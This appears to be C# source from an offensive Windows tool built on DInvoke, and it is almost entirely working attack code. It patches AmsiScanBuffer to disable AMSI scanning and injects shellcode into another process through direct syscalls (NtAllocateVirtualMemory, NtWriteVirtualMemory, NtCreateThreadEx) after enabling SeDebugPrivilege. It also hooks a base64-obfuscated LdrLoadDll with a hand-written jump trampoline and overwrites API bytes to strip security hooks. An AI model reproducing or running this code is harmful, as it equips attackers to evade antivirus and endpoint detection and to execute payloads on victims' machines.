public unsafe bool unhookSyscall(string dllName, string apiCall, byte[] content)
{
uint oldProtect = 0, x = 0;
DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\kernel32.dll");
object[] loadLibrary = { dllName };
var addr = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "LoadLibraryA",
typeof(DInvoke.Win32.DELEGATES.LoadLibrary), loadLibrary);
object[] procAddress = { addr, apiCall };
var address = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "GetProcAddress",
typeof(DInvoke.Win32.DELEGATES.GetProcAddress), procAddress);
if (address == IntPtr.Zero)
{
return(false);
}
object[] parameters = { (IntPtr)(-1), address, (UIntPtr)13, (uint)0x004, oldProtect };
IntPtr response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx",
typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters);
oldProtect = (uint)parameters[4];
byte *originalSitePointer = (byte *)address.ToPointer();
for (int k = 0; k < content.Length; k++)
{
*(originalSitePointer + k) = content[k];
}
return(true);
}
public unsafe bool Uninstall()
{
uint oldProtect = 0, x = 0;
DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\kernel32.dll");
object[] procAddress = { libraryAddress, Encoding.UTF8.GetString(Convert.FromBase64String("TGRyTG9hZERsbA==")) };
var address = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "GetProcAddress",
typeof(DInvoke.Win32.DELEGATES.GetProcAddress), procAddress);
if (address == IntPtr.Zero)
{
return(false);
}
object[] parameters = { (IntPtr)(-1), address, (UIntPtr)13, (uint)0x004, oldProtect };
IntPtr response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx",
typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters);
oldProtect = (uint)parameters[4];
byte *originalSitePointer = (byte *)address.ToPointer();
for (int k = 0; k < originalOpcodes.Length; k++)
{
*(originalSitePointer + k) = originalOpcodes[k];
}
parameters = new object[] { (IntPtr)(-1), address, (UIntPtr)13, oldProtect, x };
response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx",
typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters);
return(true);
}
private static void ChangeBytes(byte[] patch)
{
try
{
// library to load
object[] LoadLibparams =
{
"amsi.dll"
};
Console.WriteLine("[>] Manually mapping kernel32.dll into current process memory \n");
DInvoke.PE.PE_MANUAL_MAP moduleDetails = DInvoke.Map.MapModuleToMemory("C:\\Windows\\System32\\kernel32.dll");
Console.WriteLine("\n[>] Module Base : " + string.Format("{0:X}", moduleDetails.ModuleBase.ToInt64()) + "\n");
// Call LoadLibraryA for the lib from above
var lib = (IntPtr)DInvoke.DynamicGeneric.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "LoadLibraryA", typeof(LoadLib), LoadLibparams);
Console.WriteLine("[>] Process Handle : " + string.Format("{0:X}", lib.ToInt64()) + "\n");
// Function to patch
object[] GetProcAddressparams =
{
lib,
"AmsiScanBuffer"
};
// Parsing _PEB_LDR_DATA structure of kernel32.dll
IntPtr pkernel32 = DInvoke.DynamicGeneric.GetPebLdrModuleEntry("kernel32.dll");
// Get GetProcAddress Address
var pLoadLibrary = DInvoke.DynamicGeneric.GetExportAddress(pkernel32, "GetProcAddress");
// Actually Call GetProcAddress for the function mentioned above
var addr = (IntPtr)DInvoke.DynamicGeneric.DynamicFunctionInvoke(pLoadLibrary, typeof(GProcAddr), ref GetProcAddressparams);
Console.WriteLine("[>] Patch address : " + string.Format("{0:X}", addr.ToInt64()) + "\n");
uint oldProtect = 0;
// NtProtectVirtualMemory Syscall
IntPtr stub = DInvoke.DynamicGeneric.GetSyscallStub("NtProtectVirtualMemory");
NtProtectVirtualMemory NtProtectVirtualMemory = (NtProtectVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(NtProtectVirtualMemory));
Process thisproc = Process.GetCurrentProcess();
// Save value of addr as this is increased by NtProtectVirtualMemory
IntPtr oldaddress = addr;
var regionSize = (IntPtr)patch.Length;
oldProtect = 0;
var result = NtProtectVirtualMemory(
thisproc.Handle,
ref addr,
ref regionSize,
0x40,
ref oldProtect);
if (result == 0)
{
Console.WriteLine("[+] NtProtectVirtualMemory success, going to patch it now!\n");
}
else
{
Console.WriteLine("[-] NtProtectVirtualMemory failed :-(\n");
Console.WriteLine("[-] Error code: " + result + "\n");
}
Console.WriteLine("[>] Patching at address : " + string.Format("{0:X}", oldaddress.ToInt64()) + "\n");
Marshal.Copy(patch, 0, oldaddress, patch.Length);
regionSize = (IntPtr)patch.Length;
uint newoldProtect = 0;
// CleanUp permissions back to oldprotect
result = NtProtectVirtualMemory(
thisproc.Handle,
ref oldaddress,
ref regionSize,
oldProtect,
ref newoldProtect);
if (result == 0)
{
Console.WriteLine("[+] NtProtectVirtualMemory set back to oldprotect!\n");
}
else
{
Console.WriteLine("[-] NtProtectVirtualMemory to restore oldprotect failed.\n");
Console.WriteLine("[-] Error code: " + result + "\n");
}
}
catch (Exception e)
{
Console.WriteLine(" [x] {0}", e.Message);
Console.WriteLine(" [x] {0}", e.InnerException);
}
}
private static unsafe void ExecuteShellCodeInMemory(object args)
{
var parameterArguments = (object[])args;
var sc = (byte[])parameterArguments[0];
var sysCall = (SysCallManager)parameterArguments[1];
var pid = (int)parameterArguments[2];
var handle = Process.GetCurrentProcess().Handle;
if (pid != -1)
{
var token = IntPtr.Zero;
Utils.GetProcessToken(Process.GetCurrentProcess().Handle, DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenAdjustPrivileges, out token, sysCall);
var l = new List <string>();
l.Add("SeDebugPrivilege");
Utils.EnablePrivileges(token, l, sysCall);
Utils.GetProcessHandle(pid, out handle, DInvoke.Win32.Kernel32.ProcessAccessFlags.PROCESS_CREATE_THREAD | DInvoke.Win32.Kernel32.ProcessAccessFlags.PROCESS_QUERY_INFORMATION |
DInvoke.Win32.Kernel32.ProcessAccessFlags.PROCESS_VM_OPERATION |
DInvoke.Win32.Kernel32.ProcessAccessFlags.PROCESS_VM_WRITE | DInvoke.Win32.Kernel32.ProcessAccessFlags.PROCESS_VM_READ, sysCall);
}
try
{
var baseAddress = IntPtr.Zero;
var shellCode = sysCall.GetSysCallAsm("NtAllocateVirtualMemory");
DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\kernel32.dll");
object[] virtualAlloc = { IntPtr.Zero, (UIntPtr)shellCode.Length, DInvoke.Win32.Kernel32.MemoryAllocationFlags.Commit | DInvoke.Win32.Kernel32.MemoryAllocationFlags.Reserve,
DInvoke.Win32.Kernel32.MemoryProtectionFlags.ReadWrite };
var shellCodeBuffer = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualAlloc",
typeof(DInvoke.Win32.DELEGATES.VirtualAlloc), virtualAlloc);
Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length);
var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtAllocateVirtualMemory));
var arguments = new object[]
{
handle, baseAddress, (uint)0, (UIntPtr)(sc.Length + 1),
DInvoke.Win32.Kernel32.MemoryAllocationFlags.Reserve | DInvoke.Win32.Kernel32.MemoryAllocationFlags.Commit,
DInvoke.Win32.Kernel32.MemoryProtectionFlags.ExecuteReadWrite
};
uint oldProtect = 0;
object[] parameters = { (IntPtr)(-1), shellCodeBuffer, (UIntPtr)shellCode.Length, (uint)DInvoke.Win32.Kernel32.MemoryProtectionFlags.ExecuteRead, oldProtect };
IntPtr response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx",
typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters);
var returnValue = sysCallDelegate.DynamicInvoke(arguments);
if ((int)returnValue != 0)
{
return;
}
baseAddress = (IntPtr)arguments[1];
shellCode = sysCall.GetSysCallAsm("NtWriteVirtualMemory");
object[] virtualAlloc2 = { IntPtr.Zero, (UIntPtr)shellCode.Length, DInvoke.Win32.Kernel32.MemoryAllocationFlags.Commit | DInvoke.Win32.Kernel32.MemoryAllocationFlags.Reserve,
DInvoke.Win32.Kernel32.MemoryProtectionFlags.ReadWrite };
shellCodeBuffer = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualAlloc",
typeof(DInvoke.Win32.DELEGATES.VirtualAlloc), virtualAlloc2);
Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length);
sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtWriteVirtualMemory));
arguments = new object[] { handle, baseAddress, sc, (UIntPtr)(sc.Length + 1), IntPtr.Zero };
parameters = new object[] { (IntPtr)(-1), shellCodeBuffer, (UIntPtr)shellCode.Length, (uint)DInvoke.Win32.Kernel32.MemoryProtectionFlags.ExecuteRead, oldProtect };
response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx",
typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters);
returnValue = sysCallDelegate.DynamicInvoke(arguments);
baseAddress = (IntPtr)arguments[1];
if ((int)returnValue != 0)
{
return;
}
var a = new MyBuffer64();
var b = new MyBuffer64();
var u = new Unknown64();
u.Size = (uint)Marshal.SizeOf(u);
u.Unknown1 = 65539;
u.Unknown2 = 16;
u.UnknownPtr = &a;
u.Unknown4 = 65540;
u.Unknown5 = 8;
u.Unknown6 = 0;
u.UnknownPtr2 = &b;
u.Unknown3 = 0;
shellCode = sysCall.GetSysCallAsm("NtCreateThreadEx");
object[] virtualAlloc3 = { IntPtr.Zero, (UIntPtr)shellCode.Length, DInvoke.Win32.Kernel32.MemoryAllocationFlags.Commit | DInvoke.Win32.Kernel32.MemoryAllocationFlags.Reserve,
DInvoke.Win32.Kernel32.MemoryProtectionFlags.ReadWrite };
shellCodeBuffer = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualAlloc",
typeof(DInvoke.Win32.DELEGATES.VirtualAlloc), virtualAlloc3);
Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length);
sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtCreateThreadEx64));
arguments = new object[]
{
IntPtr.Zero, 0x001FFFFF, IntPtr.Zero, handle, baseAddress, IntPtr.Zero, false, (ulong)0, (ulong)0,
(ulong)0, u
};
parameters = new object[] { (IntPtr)(-1), shellCodeBuffer, (UIntPtr)shellCode.Length, (uint)DInvoke.Win32.Kernel32.MemoryProtectionFlags.ExecuteRead, oldProtect };
response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx",
typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters);
returnValue = sysCallDelegate.DynamicInvoke(arguments);
}
catch
{
}
}
public unsafe bool Install()
{
uint oldProtect = 0, x = 0;
DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\kernel32.dll");
object[] loadLibrary = { "ntdll.dll" };
libraryAddress = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "LoadLibraryA",
typeof(DInvoke.Win32.DELEGATES.LoadLibrary), loadLibrary);
object[] procAddress = { libraryAddress, Encoding.UTF8.GetString(Convert.FromBase64String("TGRyTG9hZERsbA==")) };
var address = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "GetProcAddress",
typeof(DInvoke.Win32.DELEGATES.GetProcAddress), procAddress);
if (address == IntPtr.Zero)
{
return(false);
}
object[] parameters = { (IntPtr)(-1), address, (UIntPtr)13, (uint)0x004, oldProtect };
IntPtr response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx",
typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters);
oldProtect = (uint)parameters[4];
var m = typeof(HookManager).GetMethod("hookFunc");
RuntimeHelpers.PrepareMethod(m.MethodHandle);
IntPtr replacementSite = m.MethodHandle.GetFunctionPointer();
byte *originalSitePointer = (byte *)address.ToPointer();
for (int k = 0; k < originalOpcodes.Length; k++)
{
originalOpcodes[k] = *(originalSitePointer + k);
}
if (is64BitsProcessor())
{
*originalSitePointer = 0x49;
*(originalSitePointer + 1) = 0xBB;
*((ulong *)(originalSitePointer + 2)) = (ulong)replacementSite.ToInt64(); //sets 8 bytes
//jmp r11
*(originalSitePointer + 10) = 0x41;
*(originalSitePointer + 11) = 0xFF;
*(originalSitePointer + 12) = 0xE3;
}
else
{
*originalSitePointer = 0x68;
*((uint *)(originalSitePointer + 1)) = (uint)replacementSite.ToInt32(); //sets 4 bytes
//ret
*(originalSitePointer + 5) = 0xC3;
}
parameters = new object[] { (IntPtr)(-1), address, (UIntPtr)13, oldProtect, x };
response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx",
typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters);
return(true);
}
